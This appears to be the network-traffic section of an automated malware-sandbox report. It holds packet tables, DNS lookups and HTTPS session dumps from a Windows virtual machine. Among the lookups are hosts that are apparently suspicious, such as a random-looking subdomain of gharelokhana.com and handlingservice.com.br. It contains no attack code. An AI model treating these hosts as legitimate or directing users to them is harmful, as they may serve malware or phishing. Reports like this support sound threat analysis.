                      Dec 3, 2024 17:52:39.170702934 CET49883443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.170708895 CET4434988313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.173830986 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.173867941 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.173950911 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.174074888 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.174092054 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.523411989 CET4434988513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.533279896 CET4434988513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.533432961 CET49885443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.533461094 CET49885443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.533473969 CET4434988513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.533487082 CET49885443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.533492088 CET4434988513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.536523104 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.536561012 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.536673069 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.536863089 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.536874056 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.620220900 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.620649099 CET49886443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.620675087 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:39.621819973 CET49886443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:39.621824980 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.064739943 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.068633080 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.068696022 CET49886443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.068967104 CET49886443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.068984985 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.068994999 CET49886443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.068999052 CET4434988613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.071830988 CET49891443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.071877956 CET4434989113.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.071949959 CET49891443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.072146893 CET49891443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.072160006 CET4434989113.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.697901011 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.698411942 CET49887443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.698436022 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.698863029 CET49887443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.698868036 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.884972095 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.885890961 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.885920048 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.886282921 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.886292934 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.896512985 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.896893024 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.896910906 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:40.897134066 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:40.897139072 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.142884970 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.146492004 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.146611929 CET49887443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.146646976 CET49887443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.146666050 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.146675110 CET49887443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.146680117 CET4434988713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.149466991 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.149494886 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.149580956 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.149768114 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.149775028 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.258690119 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.259392977 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.259411097 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.259761095 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.259764910 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.320301056 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.323800087 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.323837996 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.323991060 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.323991060 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.324016094 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.324016094 CET49888443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.324033022 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.324039936 CET4434988813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.326915979 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.326960087 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.327056885 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.327244997 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.327261925 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.332353115 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.335398912 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.335480928 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.335545063 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.335545063 CET49889443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.335566998 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.335581064 CET4434988913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.338323116 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.338354111 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.338469982 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.338644028 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.338654041 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.703428030 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.706382036 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.706495047 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.706542015 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.706559896 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.706569910 CET49890443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.706574917 CET4434989013.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.709325075 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.709368944 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:41.709435940 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.709594011 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:41.709610939 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:42.798475981 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:52:42.798566103 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:52:42.798629999 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:52:42.933645010 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:42.934118986 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:42.934138060 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:42.934566975 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:42.934577942 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.060807943 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.061397076 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.061427116 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.061857939 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.061862946 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.183818102 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.184263945 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.184283972 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.184732914 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.184742928 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.460937023 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.460961103 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.461016893 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.461030006 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.463435888 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.463443041 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.463455915 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.463603973 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.463635921 CET4434989213.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.463673115 CET49892443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.476154089 CET49896443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.476192951 CET4434989613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.476264000 CET49896443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.476393938 CET49896443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.476403952 CET4434989613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.479805946 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:52:43.479815960 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:52:43.504149914 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.507297039 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.507354021 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.507359028 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.507394075 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.510793924 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.510807991 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.510819912 CET49894443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.510826111 CET4434989413.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.529854059 CET49897443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.529897928 CET4434989713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.529973030 CET49897443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.530111074 CET49897443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.530126095 CET4434989713.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.561161995 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.562910080 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.562932014 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.563519001 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.563524961 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.648354053 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.652075052 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.652122021 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.652144909 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.652159929 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.652216911 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.652240992 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.652259111 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.652270079 CET49893443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.652283907 CET4434989313.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.654746056 CET49898443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.654783964 CET4434989813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:43.654856920 CET49898443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.654989004 CET49898443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:43.654999018 CET4434989813.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.028496027 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.028582096 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.028649092 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.028924942 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.028947115 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.028959036 CET49895443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.028970003 CET4434989513.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.031776905 CET49899443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.031833887 CET4434989913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:44.031918049 CET49899443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.032099962 CET49899443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:44.032116890 CET4434989913.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:45.271348000 CET4434989613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:45.271996975 CET49896443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:45.272027969 CET4434989613.107.246.63192.168.2.6
                      Dec 3, 2024 17:52:45.272468090 CET49896443192.168.2.613.107.246.63
                      Dec 3, 2024 17:52:45.272474051 CET4434989613.107.246.63192.168.2.6
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 3, 2024 17:51:20.812758923 CET53636291.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:21.007570028 CET53532461.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:23.985097885 CET53641221.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:24.570086002 CET6480053192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:24.570261955 CET4938253192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:24.708381891 CET53648001.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:24.708750010 CET53493821.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:26.721024036 CET6370753192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:26.721188068 CET5087753192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:26.947633982 CET53508771.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:27.006530046 CET53637071.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:28.961450100 CET6432753192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:28.961600065 CET5778553192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:29.174904108 CET53577851.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:29.196599960 CET53643271.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:34.090641022 CET5611553192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:34.090876102 CET6020253192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:35.102143049 CET6156553192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:35.102281094 CET5394853192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:35.887784004 CET53602021.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:35.887865067 CET53539481.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:35.887897015 CET53615651.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:35.888432980 CET53561151.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:41.128582001 CET5930453192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:41.128727913 CET5119853192.168.2.61.1.1.1
                      Dec 3, 2024 17:51:41.130275011 CET53574551.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:41.492119074 CET53593041.1.1.1192.168.2.6
                      Dec 3, 2024 17:51:41.492527008 CET53511981.1.1.1192.168.2.6
                      Dec 3, 2024 17:52:00.023025990 CET53653021.1.1.1192.168.2.6
                      Dec 3, 2024 17:52:20.617892027 CET53594521.1.1.1192.168.2.6
                      Dec 3, 2024 17:52:22.584690094 CET53550241.1.1.1192.168.2.6
                      TimestampSource IPDest IPChecksumCodeType
                      Dec 3, 2024 17:51:21.007673025 CET192.168.2.61.1.1.1c21d(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Dec 3, 2024 17:51:24.570086002 CET192.168.2.61.1.1.10x6fefStandard query (0)www.google.comA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:24.570261955 CET192.168.2.61.1.1.10x16eeStandard query (0)www.google.com65IN (0x0001)false
                      Dec 3, 2024 17:51:26.721024036 CET192.168.2.61.1.1.10x83eeStandard query (0)google.dzA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:26.721188068 CET192.168.2.61.1.1.10x14bStandard query (0)google.dz65IN (0x0001)false
                      Dec 3, 2024 17:51:28.961450100 CET192.168.2.61.1.1.10x27ceStandard query (0)www.google.dzA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:28.961600065 CET192.168.2.61.1.1.10xe93bStandard query (0)www.google.dz65IN (0x0001)false
                      Dec 3, 2024 17:51:34.090641022 CET192.168.2.61.1.1.10x39afStandard query (0)handlingservice.com.brA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:34.090876102 CET192.168.2.61.1.1.10xe4ceStandard query (0)handlingservice.com.br65IN (0x0001)false
                      Dec 3, 2024 17:51:35.102143049 CET192.168.2.61.1.1.10x29c6Standard query (0)handlingservice.com.brA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:35.102281094 CET192.168.2.61.1.1.10xea17Standard query (0)handlingservice.com.br65IN (0x0001)false
                      Dec 3, 2024 17:51:41.128582001 CET192.168.2.61.1.1.10x8d7cStandard query (0)cjcjjdkdkfkfje.gharelokhana.comA (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:41.128727913 CET192.168.2.61.1.1.10x9e9fStandard query (0)cjcjjdkdkfkfje.gharelokhana.com65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Dec 3, 2024 17:51:12.266261101 CET1.1.1.1192.168.2.60x7892No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Dec 3, 2024 17:51:12.266261101 CET1.1.1.1192.168.2.60x7892No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:24.708381891 CET1.1.1.1192.168.2.60x6fefNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:24.708750010 CET1.1.1.1192.168.2.60x16eeNo error (0)www.google.com65IN (0x0001)false
                      Dec 3, 2024 17:51:27.006530046 CET1.1.1.1192.168.2.60x83eeNo error (0)google.dz142.251.37.195A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:29.196599960 CET1.1.1.1192.168.2.60x27ceNo error (0)www.google.dz172.217.171.195A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:35.887897015 CET1.1.1.1192.168.2.60x29c6No error (0)handlingservice.com.br191.252.162.52A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:35.888432980 CET1.1.1.1192.168.2.60x39afNo error (0)handlingservice.com.br191.252.162.52A (IP address)IN (0x0001)false
                      Dec 3, 2024 17:51:41.492119074 CET1.1.1.1192.168.2.60x8d7cNo error (0)cjcjjdkdkfkfje.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                      • login.live.com
                      • otelrules.azureedge.net
                      • google.dz
                      • fs.microsoft.com
                      • www.google.dz
                      • slscr.update.microsoft.com
                      • handlingservice.com.br
                      • https:
                        • cjcjjdkdkfkfje.gharelokhana.com
                      Session IDSource IPSource PortDestination IPDestination Port
                      0192.168.2.64970520.190.147.10443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:12 UTC422OUTPOST /RST2.srf HTTP/1.0
                      Connection: Keep-Alive
                      Content-Type: application/soap+xml
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                      Content-Length: 4775
                      Host: login.live.com
                      2024-12-03 16:51:12 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                      2024-12-03 16:51:12 UTC569INHTTP/1.1 200 OK
                      Cache-Control: no-store, no-cache
                      Pragma: no-cache
                      Content-Type: application/soap+xml; charset=utf-8
                      Expires: Tue, 03 Dec 2024 16:50:12 GMT
                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                      Referrer-Policy: strict-origin-when-cross-origin
                      x-ms-route-info: C558_SN1
                      x-ms-request-id: 24c0dc2b-3bfc-43d2-ba96-3528fd2f405c
                      PPServer: PPV: 30 H: SN1PEPF0002F90B V: 0
                      X-Content-Type-Options: nosniff
                      Strict-Transport-Security: max-age=31536000
                      X-XSS-Protection: 1; mode=block
                      Date: Tue, 03 Dec 2024 16:51:11 GMT
                      Connection: close
                      Content-Length: 11410
                      2024-12-03 16:51:12 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                      Session IDSource IPSource PortDestination IPDestination Port
                      1192.168.2.64970620.198.118.190443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:13 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 71 34 39 6e 7a 41 47 76 6b 53 53 63 4c 42 77 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 65 33 39 37 38 63 34 61 62 39 38 63 61 36 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: dq49nzAGvkSScLBw.1Context: c6e3978c4ab98ca6
                      2024-12-03 16:51:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
